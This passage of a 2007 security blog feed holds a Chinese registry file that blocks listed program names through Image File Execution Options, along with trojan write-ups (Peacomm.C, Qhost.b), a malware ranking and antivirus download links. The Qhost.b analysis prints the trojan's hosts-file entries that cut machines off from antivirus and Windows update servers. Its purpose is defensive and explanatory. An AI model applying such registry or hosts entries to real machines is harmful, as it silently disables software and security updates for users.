NT\CurrentVersion\Image File Execution Options\belt.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Biprep.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blss.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bokja.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootconf.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brasil.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BRIDGE.DLL]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Buddy.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BUGSFIX.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bundle.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bvt.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cashback.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cdaEngine.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd32.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmesys.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conime.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conscorr.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crss.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cxtpls.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\datemanager.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcomx.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Desktop.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\directs.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dmserver.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpi.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dssagent.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvdkeyauth.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\emsw.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exdl.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exec.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXP.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explore.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explored.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Fash.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />以上請自己複制到記事本,保存爲.reg的文件,運行導入即可!<br /><br />注意:本文件裏有對訊雷軟件的禁止,還有QQ音速,請大家把它找出來去掉,以避免這個不能運行。其他的你們可以自己加,直接修改最後一個參數即可。</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-4046335572730606517?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-74528538081057173882007-08-23T19:54:00.000-07:002007-08-23T19:55:50.568-07:00New Threat : Trojan.Peacomm.C<div id="tabModBdy"> <div> <strong>Discovered: </strong>August 22, 2007</div> <div> <strong>Updated: </strong>August 22, 2007 2:09:36 PM</div> <div> <strong>Type: </strong>Trojan</div> <div> <strong>Infection Length: </strong>114,606 bytes</div> <div> <strong>Systems Affected: </strong>Windows XP, Windows Server 2003, Windows 2000</div> This Trojan may be downloaded as one of the following files:<br /><ul><li>ecard.exe</li><li>msdataaccess.exe</li><li>applet.exe</li></ul><br /><br />When the Trojan is executed, it copies itself to the following location:<br />%Windir%\spooldr.exe<br /><br />Next, the Trojan drops an embedded kernel driver to the following location:<br />%System%\spooldr.sys<br /><br />It then attempts to infect the following legitimate Windows driver with a copy of Trojan.Peacomm.ini<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2007-073018-3056-99"></a><br />%System%\drivers\kbdclass.sys<br /><br />It also attempts to infect the cached copy of the above driver:<br />%System%\dllcache\kbdclass.sys<br /><br />The infected driver is also copied to the following locations:<br /><ul><li>%Windir%\LastGood\system32\drivers\kbdclass.sys</li><li>%System%\Drivers\old5.tmp</li></ul><br /><br />The Trojan then ends and waits for the user to restart the computer.<br /><br />When the computer is restarted, the file kbdclass.sys is loaded.<br /><br />The infected driver then loads the following file:<br />%System%\spooldr.sys<br /><br />The above file injects itself into the following process:<br />explorer.exe<br /><br />It also has rootkit functionalities to hide the following process:<br />spooldr.exe<br /><br />The rootkit also hides the following files:<br /><ul><li>%System%\spooldr.sys</li><li>%Windir%\spooldr.ini</li></ul><br /><br />It also disables the following security-related software:<br /><ul><li>ZoneAlarm Firewall</li><li>PC Watchdog Systems</li><li>Bcfilter Jetico Personal Firewall</li><li>Outpost Firewall</li><li>McAfee Anti Spyware</li><li>McAfee Internet Security Suite</li><li>FSecure Black Light</li><li>Kaspersky Anti Virus</li><li>Symantec Anti Virus</li><li>BitDefender Anti Virus</li><li>FSecure Anti Virus</li><li>Microsoft Anti Spyware</li><li>InterCheck Monitor</li><li>NOD32 Anti Virus</li><li>Panda Anti Virus</li></ul><br /><br />The Trojan then checks for the presence of VMWare or VirtualPC. If one of these virtual machines is detected, the Trojan enters an infinite loop and does nothing.<br /><br />If the above virtual machines are not present, the Trojan creates the following event to ensure that only one copy of the threat is running on the computer:<br />K8JT6Hnjm$#jui#WWhHHgG<br /><br />The Trojan then drops an encrypted list of initial peers to the following configuration file:<br />%Windir%\spooldr.ini<br /><br />It registers the compromised computer as a peer in the existing file-sharing network, using the Overnet protocol by connecting to the peers specified in the initial peer list. It uses a randomly chosen UDP port to communicate with the other peers.<br /><br />The file-sharing network can then be used by a remote attacker as a back door to gain access to the compromised computer.<br /><br />The Trojan then steals operating system information from the compromised computer.<br /><br />It also harvests email addresses from the computer by searching for files with the following extensions:<br /><ul><li>.wab</li><li>.txt</li><li>.msg</li><li>.htm</li><li>.shtm</li><li>.stm</li><li>.xml</li><li>.dbx</li><li>.mbx</li><li>.mdx</li><li>.eml</li><li>.nch</li><li>.mmf</li><li>.ods</li><li>.cfg</li><li>.asp</li><li>.php</li><li>.pl</li><li>.wsh</li><li>.adb</li><li>.tbb</li><li>.sht</li><li>.xls</li><li>.oft</li><li>.uin</li><li>.cgi</li><li>.mht</li><li>.dhtm</li><li>.jsp</li><li>.dat</li><li>.lst</li></ul><br /><br />The Trojan then sends spam emails by using its own SMTP engine.<br /><br />It does not send emails to email addresses containing the following strings:<br /><ul><li>@microsoft</li><li>rating@</li><li>f-secur</li><li>news</li><li>update</li><li>anyone@</li><li>bugs@</li><li>contract@</li><li>feste</li><li>gold-certs@</li><li>help@</li><li>info@</li><li>nobody@</li><li>noone@</li><li>kasp</li><li>admin</li><li>icrosoft</li><li>support</li><li>ntivi</li><li>unix</li><li>bsd</li><li>linux</li><li>listserv</li><li>certific</li><li>sopho</li><li>@foo</li><li>@iana</li><li>free-av</li><li>@messagelab</li><li>winzip</li><li>google</li><li>winrar</li><li>samples</li><li>abuse</li><li>panda</li><li>cafee</li><li>spam</li><li>pgp</li><li>@avp.</li><li>noreply</li><li>local</li><li>root@</li><li>postmaster@</li></ul><br /><br />The Trojan steals information from the following registry subkey, which contains a unique ID for the computer on the file-sharing network:<br />HKEY_LOCAL_MACHINE\Microsoft\Windows\ITStorage\Finders\"config"<br /><br />The Trojan may then download and execute potentially malicious files on to the compromised computer.<h3>Recommendations</h3><p>Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":</p> <ul class="listSQbl"><li>Turn off and remove unneeded services. By default, many operating systems install auxiliary services that are not critical, such as an FTP server, telnet, and a Web server. These services are avenues of attack. If they are removed, blended threats have less avenues of attack and you have fewer services to maintain through patch updates.</li><li>If a <a href="http://securityresponse.symantec.com/avcenter/refa.html#blended_threat">blended threat</a> exploits one or more network services, disable, or block access to, those services until a patch is applied.</li><li>Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services (for example, all Windows-based computers should have the current Service Pack installed.). Additionally, please apply any security updates that are mentioned in this writeup, in trusted Security Bulletins, or on vendor Web sites.</li><li>Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.</li><li>Configure your email server to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif and .scr files.</li><li>Isolate infected computers quickly to prevent further compromising your organization. Perform a forensic analysis and restore the computers using trusted media.</li><li>Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.</li></ul></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-7452853808105717388?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-61329757884812718892007-08-23T01:55:00.001-07:002007-08-23T01:55:50.126-07:00Online Scanner Top Twenty for July 2007<table style="margin: 0pt;" border="0" cellpadding="0" cellspacing="0"><tbody><tr valign="top"><td nowrap="nowrap"><span class="med_news" klmark="vlauthor:153244358"><b>Alexander Gostev</b></span></td></tr> <tr valign="top"><td style="padding-left: 7px;"><span class="med_news">Senior Virus Analyst, Kaspersky Lab</span></td></tr> </tbody></table> <div align="center"> <table border="0" cellpadding="4" cellspacing="0" width="75%"> <tbody><tr style="" align="center" valign="center"> <td style="" width="17%">Position</td> <td style="" width="17%">Change in position</td> <td style="" width="50%">Name</td> <td style="" width="16%">Percentage</td> </tr> <tr align="center" valign="top"> <td style=""> 1. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_ret.gif" alt="Return" border="0" height="12" width="12" /> Return </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=52558" class="virus">Trojan.Win32.Dialer.cj</a> </td><td style=""> 8.82 </td> </tr> <tr align="center" valign="top"> <td style=""> 2. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=161346" class="virus">Backdoor.Win32.IRCBot.acd</a> </td><td style=""> 4.21 </td> </tr> <tr align="center" valign="top"> <td style=""> 3. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_down.gif" alt="Down" border="0" height="12" width="12" /> -1 </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=128336" class="virus">Trojan.Win32.Dialer.qn</a> </td><td style=""> 2.37 </td> </tr> <tr align="center" valign="top"> <td style=""> 4. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=159505" class="virus">Trojan-Downloader.Win32.Small.eqn</a> </td><td style=""> 2.31 </td> </tr> <tr align="center" valign="top"> <td style=""> 5. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_down.gif" alt="Down" border="0" height="12" width="12" /> -1 </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=48146" class="virus">Backdoor.IRC.Zapchast</a> </td><td style=""> 2.16 </td> </tr> <tr align="center" valign="top"> <td style=""> 6. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_down.gif" alt="Down" border="0" height="12" width="12" /> -3 </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=155970" class="virus">Trojan-Downloader.Win32.LoadAdv.gen</a> </td><td style=""> 1.68 </td> </tr> <tr align="center" valign="top"> <td style=""> 7. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_ret.gif" alt="Return" border="0" height="12" width="12" /> Return </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=61170" class="virus">Backdoor.Win32.mIRC-based</a> </td><td style=""> 1.55 </td> </tr> <tr align="center" valign="top"> <td style=""> 8. </td><td style=""> <img src="http://images.kaspersky.com/ru/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=156717" class="virus">Packed.Win32.PolyCrypt.b</a> </td><td style=""> 1.42 </td> </tr> <tr align="center" valign="top"> <td style=""> 9. </td><td style=""> <img src="http://images.kaspersky.com/ru/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=163207" class="virus">Trojan-Downloader.Win32.Tibs.mq</a> </td><td style=""> 1.09 </td> </tr> <tr align="center" valign="top"> <td style=""> 10. </td><td style=""> <img src="http://images.kaspersky.com/ru/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=163299" class="virus">Trojan-Downloader.Win32.Nurech.bs</a> </td><td style=""> 1.08 </td> </tr> <tr align="center" valign="top"> <td style=""> 11. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_down.gif" alt="Down" border="0" height="12" width="12" /> -10 </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=159284" class="virus">not-a-virus:AdWare.Win32.Virtumonde.jp</a> </td><td style=""> 1.04 </td> </tr> <tr align="center" valign="top"> <td style=""> 12. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_ret.gif" alt="Return" border="0" height="12" width="12" /> Return </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=147355" class="virus">Virus.VBS.Small.a</a> </td><td style=""> 0.88 </td> </tr> <tr align="center" valign="top"> <td style=""> 13. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=90316" class="virus">Backdoor.IRC.Cloner.ae</a> </td><td style=""> 0.87 </td> </tr> <tr align="center" valign="top"> <td style=""> 14. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=142385" class="virus">Trojan.Win32.Agent.abe</a> </td><td style=""> 0.64 </td> </tr> <tr align="center" valign="top"> <td style=""> 15. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=162231" class="virus">Trojan-Downloader.Win32.BHO.l</a> </td><td style=""> 0.62 </td> </tr> <tr align="center" valign="top"> <td style=""> 16. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=107668" class="virus">Trojan-Proxy.Win32.Small.du</a> </td><td style=""> 0.62 </td> </tr> <tr align="center" valign="top"> <td style=""> 17. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_ret.gif" alt="Return" border="0" height="12" width="12" /> Return </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=93323" class="virus">not-a-virus:PSWTool.Win32.RAS.a</a> </td><td style=""> 0.60 </td> </tr> <tr align="center" valign="top"> <td style=""> 18. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=159198" class="virus">Trojan-Downloader.Win32.Alphabet.gen</a> </td><td style=""> 0.59 </td> </tr> <tr align="center" valign="top"> <td style=""> 19. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_new.gif" alt="New!" border="0" height="12" width="12" /> New </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=64787" class="virus">Trojan.Win32.Dialer.fn</a> </td><td style=""> 0.55 </td> </tr> <tr align="center" valign="top"> <td style=""> 20. </td><td style=""> <img src="http://images.kaspersky.com/en/vldesign/top20_ret.gif" alt="Return" border="0" height="12" width="12" /> Return </td><td style="padding-left: 15px;" align="left"> <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=22895" class="virus">Email-Worm.Win32.Rays</a> </td><td style=""> 0.52 </td> </tr> <tr align="center" valign="center"> <td colspan="3" style="" align="left"> Other malicious programs </td><td style=""> 66.38 </td> </tr> </tbody></table> </div> <p>After a short break, Trojan Dialers are again at the top of the rankings based on the results of our July online scanner activity. In June, as we noted the rise of Dialer.qn, we predicted a new attack of such programs. This month the first position, and a respectable 9%, is taken by Dialer.cj. This Trojan is by no means new on the charts, and it actually topped the rankings in December 2006. Now, seven months later, we are witnessing its comeback. </p><p>On the whole, a look at this month’s Top Twenty produces a déjà vu effect: in addition to the two Trojan Dialers among the top three malicious programs, the ranking includes a number of backdoors that enable remote control of a system via IRC channels. These are IRCBot.acd (2nd place), Zapchast (5th), mIRC-based (7th), Cloner.ae (13th). All of them have pushed down various adware programs, which had steadily increased their standing in the rankings in May and June, primarily due to the rise of Virtumonde variants. For the June leader, Virtumonde.jp, this onslaught was too much and it dropped by 10 positions in a single month. </p><p>However, this does not mean that adware will give up easily. Althought Trojan-Downloader.Win32.LoadAdv.gen has moved down by three places (from the 3rd to the 6th), in terms of percentage points it has not lost much ground: it accounted for 1.68% of the malware detected in July, compared to 2.14% in June. Since this Trojan downloads various adware programs onto an infected system, it is likely to continue spreading. </p><p>The newcomers to the Top Twenty are relatively numerous – 11 malicious programs. As before, almost half of these are new Trojan Downloader variants. Trojan-Downloader.Win32.Nurech and Alphabet.gen, which are used to create botnets, are particularly dangerous. </p><p>Classic viruses Virus.VBS.Small.a and Email-Worm.Win32.Rays are back in the ranking. Rays left the Top Twenty ranking a month ago, but in July it somehow managed to make it back to the bottom position. As for its “twin brother”, the Brontok worm, which fell 7 places in the past two months, it did not make it into our latest statistics. </p> <div align="left"> <h2>Summary</h2> <ol><li class="large"><b>New</b>: Backdoor.Win32.IRCBot.acd, Trojan-Downloader.Win32.Small.eqn, Packed.Win32.PolyCrypt.b, Trojan-Downloader.Win32.Tibs.mq, Trojan-Downloader.Win32.Nurech.bs, Backdoor.IRC.Cloner.ae, Trojan.Win32.Agent.abe, Trojan-Downloader.Win32.BHO.l, Trojan-Proxy.Win32.Small.du, Trojan-Downloader.Win32.Alphabet.gen, Trojan.Win32.Dialer.fn </li><li class="large"><b>Moved down</b>: Trojan.Win32.Dialer.qn, Backdoor.IRC.Zapchast, Trojan-Downloader.Win32.LoadAdv.gen, not-a-virus:AdWare.Win32.Virtumonde.jp </li><li class="large"><b>Re-entry</b>: Trojan.Win32.Dialer.cj, Backdoor.Win32.mIRC-based, Virus.VBS.Small.a, not-a-virus:PSWTool.Win32.RAS.a, Email-Worm.Win32.Rays. </li></ol></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6132975788481271889?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-77600882611035007772007-08-23T01:51:00.000-07:002007-08-23T01:54:34.174-07:00New Threat : Trojan.Win32.Qhost.bAliases<br />Trojan.Win32.Qhost.b is also known as: Trj/Qhost.gen<br />Description added Aug 23 2007<br />Behavior Trojan<br /><br /><br />Technical details<br /><br />This Trojan is designed to modify the mapping of domain names to IP addresses. It is a Windows PE EXE file. It is 20 585 bytes in size. It is written in Borland Delphi. It is packed using FSG. The unpacked file is approximately 70KB in size.<br />Payload<br /><br />This Trojan is a modified Windows %System%\drivers\etc\hosts file, which is used to map domain names (DNS) to IP addresses. The following strings are added to the hosts file.<br /><br />127.0.0.1 http://downloads4.kaspersky-labs.com<br />127.0.0.1 http://downloads3.kaspersky-labs.com<br />127.0.0.1 http://downloads2.kaspersky-labs.com<br />127.0.0.1 http://downloads1.kaspersky-labs.com<br />127.0.0.1 ftp://downloads4.kaspersky-labs.com<br />127.0.0.1 ftp://downloads3.kaspersky-labs.com<br />127.0.0.1 ftp://downloads2.kaspersky-labs.com<br />127.0.0.1 ftp://downloads1.kaspersky-labs.com<br />127.0.0.1 downloads-us1.kaspersky-labs.com<br />127.0.0.1 rads.mcafee.com<br />127.0.0.1 http://www.secuser.com<br />127.0.0.1 a188.x.akamai.net<br />127.0.0.1 liveupdate.symantecliveupdate.com<br />127.0.0.1 liveupdate.symantec.com<br />127.0.0.1 liveupdate.symantec.d4p.net<br />127.0.0.1 update.symantec.com<br />127.0.0.1 ftp.nai.com<br />127.0.0.1 www.grisoft.cz<br />127.0.0.1 www.grisoft.com<br />127.0.0.1 free.grisoft.cz<br />127.0.0.1 tds.diamondcs.com.au<br />127.0.0.1 ieupdate.gdata.de<br />127.0.0.1 ieupdate6.gdata.de<br />127.0.0.1 ieupdate5.gdata.de<br />127.0.0.1 ieupdate4.gdata.de<br />127.0.0.1 ieupdate3.gdata.de<br />127.0.0.1 ieupdate2.gdata.de<br />127.0.0.1 ieupdate1.gdata.de<br />127.0.0.1 www.iavs.cz<br />127.0.0.1 download7.avast.com<br />127.0.0.1 download6.avast.com<br />127.0.0.1 download5.avast.com<br />127.0.0.1 download4.avast.com<br />127.0.0.1 download3.avast.com<br />127.0.0.1 download2.avast.com<br />127.0.0.1 download1.avast.com<br />127.0.0.1 upgrade.bitdefender.com<br />127.0.0.1 windowsupdate.microsoft.com<br />127.0.0.1 www.lavasoftusa.com<br />127.0.0.1 www.a-2.org<br />127.0.0.1 updates.a-2.org<br />127.0.0.1 niuone.norman.no<br />127.0.0.1 www.diamondcs.com.au<br />127.0.0.1 www.attechnical.com<br />127.0.0.1 www.zeylstra.nl<br />127.0.0.1 fractus.mat.uson.mx<br />127.0.0.1 www.toonbox.de<br />127.0.0.1 radius.turvamies.com<br />127.0.0.1 diamondcs.fileburst.com<br />127.0.0.1 downloads.My-eTrust.com<br />127.0.0.1 acs.pandasoftware.com<br />127.0.0.1 v4.windowsupdate.microsoft.com<br />127.0.0.1 www.NoAdware.net<br />127.0.0.1 www.nod32.com<br />127.0.0.1 www.eset.sk<br />127.0.0.1 avu.zonelabs.com<br />127.0.0.1 retail.sp.f-secure.com<br />127.0.0.1 retail01.sp.f-secure.com<br />127.0.0.1 retail02.sp.f-secure.com<br />127.0.0.1 www.moosoft.com<br />127.0.0.1 secuser.model-fx.com<br />127.0.0.1 secuser.com<br />127.0.0.1 downloads-eu1.kaspersky-labs.com<br />127.0.0.1 downloads2.kaspersky-labs.com<br />127.0.0.1 downloads4.kaspersky-labs.com<br />127.0.0.1 downloads1.kaspersky-labs.com<br />127.0.0.1 pccreg.antivirus.com<br />127.0.0.1 dl1.antivir.de<br />127.0.0.1 dl2.antivir.de<br />127.0.0.1 dl3.antivir.de<br />127.0.0.1 dl4.antivir.de<br /><br />The modifications made to %System%\drivers\etc\hosts make it impossible to access the resources listed above from the victim machine.<br />Removal instructions<br /><br />If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:<br /><br /> 1. Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).<br /> 2. Modify the %System%\drivers\etc\hosts file using any standard application (e.g. Notepad). Delete the strings added by the Trojan. The original hosts file has the following contents:<br /><br /> # Copyright (c) 1993-1999 Microsoft Corp.<br /> #<br /> # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.<br /> #<br /> # This file contains the mappings of IP addresses to host names. Each<br /> # entry should be kept on an individual line. The IP address should<br /> # be placed in the first column followed by the corresponding host name.<br /> # The IP address and the host name should be separated by at least one<br /> # space.<br /> #<br /> # Additionally, comments (such as these) may be inserted on individual<br /> # lines or following the machine name denoted by a '#' symbol.<br /> #<br /> # For example:<br /> #<br /> # 102.54.94.97 rhino.acme.com # source server<br /> # 38.25.63.10 x.acme.com # x client host<br /><br /> 127.0.0.1 localhost<br /><br /> 3. Update your antivirus databases and perform a full scan of the computer<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-7760088261103500777?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-50021900239161394172007-08-22T19:58:00.000-07:002007-08-22T19:59:06.160-07:00BitDefender Total Security 2008 Beta 432bit : <a href="http://download.bitdefender.com/windows/desktop/total_security/beta/bitdefender_totalsecurity_v11_b4.exe" target="_blank">http://download.bitdefender.com/windows/desktop/total_security/beta/bitdefender_totalsecurity_v11_b4.exe</a><br /><br />64bit :<a href="http://download.bitdefender.com/windows/desktop/total_security/beta/x64/bitdefender_totalsecurity_v11_b4.exe" target="_blank">http://download.bitdefender.com/ ... security_v11_b4.exe</a><div class="blogger-post-footer"><img width='1' height='1' 